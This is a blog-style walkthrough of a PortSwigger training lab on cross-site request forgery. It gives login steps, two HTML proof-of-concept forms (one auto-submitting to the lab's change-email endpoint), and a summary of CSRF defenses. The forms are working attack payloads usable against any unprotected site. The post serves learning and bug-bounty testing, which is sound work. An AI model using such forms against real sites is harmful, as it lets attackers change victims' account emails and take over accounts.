Hey, guys welcome to my blog so today we are going to discuss about CSRF vulnerability which is probably medium/low severity and we are going to solve the basic portswigger lab of CSRF finale we end up with some common defenses against CSRF

“Application security prioritizes impact over bug classification.!!”

https://evilox.medium.com/explanation-of-csrf-cross-site-request-forgery-bc6a5042bcbf

In the above article, I discuss basic of CRSF vulnerability which you will get a good understanding of CSRF vulnerability so now let’s move on to the portswigger lab

Hunting for CSRF

Alert: Before looking for this check your out-scope of the bug bounty program

Lab : CSRF vulnerability with no defenses: In this lab, there is no protection against CSRF vulnerability

1. First Login/signup into that application

You can log in to your account using the following credentials: wiener:peter

2. Look for the state change action endpoint:

which is password change, email change, address change, deleting an account, sending a message

the above endpoints are the example you can choose any high-severity action endpoint that makes the change high for the user

Here there is an email updating endpoint and you can able to change the mail

3. Lack of CSRF Protection: Check for Lack of CSRF protection using burpsuite

First, enter any mail id [email protected] and capture that request in burp and check whether there is a CSRF token in the body or the cookie

It looks like this [ csrf_token = “e1f55fd7a4b0c8d7c32a3be95a38f6bc” ]

check the header also X-CSRF: e1f55fd7a4b0c8d7c32a3be95a38f6bc

So there is no CSRF token

3. Draft the HTML form to confirm this Vulnerability

If you have burpsuite professional edition it would be easy to generate the CSRF POC or if you don’t have the means it is ok there alternative for this

1. Burpsuite Professional Edition { Engagement tools -> Generate CSRF POC generator }

Click Generate CSRF POC you will get the HTML form

Here you can directly test this by test in the browser option or copy and paste it into a local file and saved it in CSRF.html which makes it better for future use or report

Now open this in your browser and click the submit request

Now the Email id will get the change if it changes congratulations you have found the first CSRF vulnerability on that application

2. Alternative Method if don’t have Burpsuite pro edition

Use this website: https://csrf.infos3c.net/

On this website, you need to copy and paste the message body on that site and you will get the POC ( Use at your own risk )

or simply use the below HTML form

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="URL" method="POST">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

In this form, you need to do it manually adding the input but it is better to use the website for POC

3. Solving this Lab

To solve this Lab there is an exploit server right so go to the exploit server and paste the CSRF HTML form on the body

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a8800fd03f47b4580bab77.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" value="Submit request" />
    </form>
<script>
        document.forms[0].submit();
</script>
  </body>
</html>

And we have added some javascript

<script>
        document.forms[0].submit();
</script>

Which helps us to automaticity redirect this is not necessary for the bug bounty program but it CTF

You just need to show the change in the application

Beginners Tip: First, take note of all the state-changing requests and use firefox don’t use Chrome for CSRF bug

Common protection for CSRF

• CSRF tokens — A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. This makes it very difficult for an attacker to construct a valid request on behalf of the victim.
• SameSite cookies — SameSite is a browser security mechanism that determines when a website’s cookies are included in requests originating from other websites. As requests to perform sensitive actions typically require an authenticated session cookie, the appropriate SameSite restrictions may prevent an attacker from triggering these actions cross-site. Since 2021, Chrome enforces Lax SameSite restrictions by default. As this is the proposed standard, we expect other major browsers to adopt this behavior in the future.
• Referer-based validation — Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application’s own domain. This is generally less effective than CSRF token validation

In the next article, we will see how to bypass the above protection

So I hope you will understand this article if you like this give applause and follow me on Medium for more articles if have any doubts don’t hesitate to contact me

Follow Me on Instagram: https://www.instagram.com/_._vicki__/

Linkedin: https://www.linkedin.com/in/vignesh-rajeshkannan/